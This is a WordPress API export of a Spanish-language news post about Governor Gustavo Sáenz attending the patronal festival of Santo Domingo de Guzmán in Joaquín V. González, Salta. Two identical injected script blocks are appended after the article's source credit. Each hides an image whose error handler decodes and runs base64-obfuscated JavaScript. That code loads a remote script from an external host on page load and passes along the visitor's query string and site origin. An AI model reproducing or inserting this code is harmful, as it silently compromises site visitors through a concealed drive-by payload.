{"id":1269,"date":"2022-08-09T10:07:59","date_gmt":"2022-08-09T13:07:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1269"},"modified":"2025-08-14T00:38:59","modified_gmt":"2025-08-14T03:38:59","slug":"con-la-participacion-de-saenz-culminaron-las-fiestas-patronales-de-joaquin-v-gonzalez","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1269","title":{"rendered":"Con la participaci\u00f3n de S\u00e1enz culminaron las fiestas patronales de Joaqu\u00edn V. Gonz\u00e1lez"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#342704\">El Gobernador estuvo presente en la 26\u00b0 edici\u00f3n de las fiestas patronales en honor a Santo Domingo de Guzm\u00e1n, que se desarroll\u00f3 en el complejo deportivo de la localidad con un festival que tuvo una destacada cartelera de artistas.<\/h4>\n\n\n\n<p>En Joaqu\u00edn V. Gonz\u00e1lez, el gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>&nbsp;particip\u00f3 del cierre de las fiestas patronales en honor a Santo Domingo de Guzm\u00e1n. En la oportunidad estuvo acompa\u00f1ado por el intendente local, Juan Domingo Aguirre.<\/p>\n\n\n\n<p>El mandatario asisti\u00f3 a la \u00faltima velada de la 26\u00b0 edici\u00f3n del festival realizado en el complejo municipal con entrada libre y gratuita.<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3686-con-la-participacion-de-saenz-culminaron-las-fiestas-patronales-de-joaquin-v-gonzalez.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3686-con-la-participacion-de-saenz-culminaron-las-fiestas-patronales-de-joaquin-v-gonzalez.jpg\" alt=\"Con la participaci\u00f3n de S\u00e1enz culminaron las fiestas patronales de Joaqu\u00edn V. Gonz\u00e1lez\"\/><\/a><\/figure>\n\n\n\n<p>Con capacidad colmada, en la \u00faltima noche actuaron el Chaque\u00f1o Palavecino, el Indio Rojas, L\u00e1zaro Caballero, Christian Herrera y Matacos, y el grupo Los Pregoneros.<\/p>\n\n\n\n<p>Los actos oficiales iniciaron ayer con la celebraci\u00f3n de la misa, la procesi\u00f3n y el tradicional desfile c\u00edvico militar con una importante asistencia de vecinos.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/con-la-participacion-de-saenz-culminaron-las-fiestas-patronales-de-joaquin-v-gonzalez-84120\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Gobernador estuvo presente en la 26\u00b0 edici\u00f3n de las fiestas patronales en honor a Santo Domingo de Guzm\u00e1n, que se desarroll\u00f3 en el complejo deportivo de la localidad con un festival que tuvo una destacada cartelera de artistas. En Joaqu\u00edn V. Gonz\u00e1lez, el gobernador&nbsp;Gustavo S\u00e1enz&nbsp;particip\u00f3 del cierre de las fiestas patronales en honor a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1270,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-1269","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1269"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1269"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1269\/revisions"}],"predecessor-version":[{"id":7401,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1269\/revisions\/7401"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1270"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1269"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1269"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1269"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}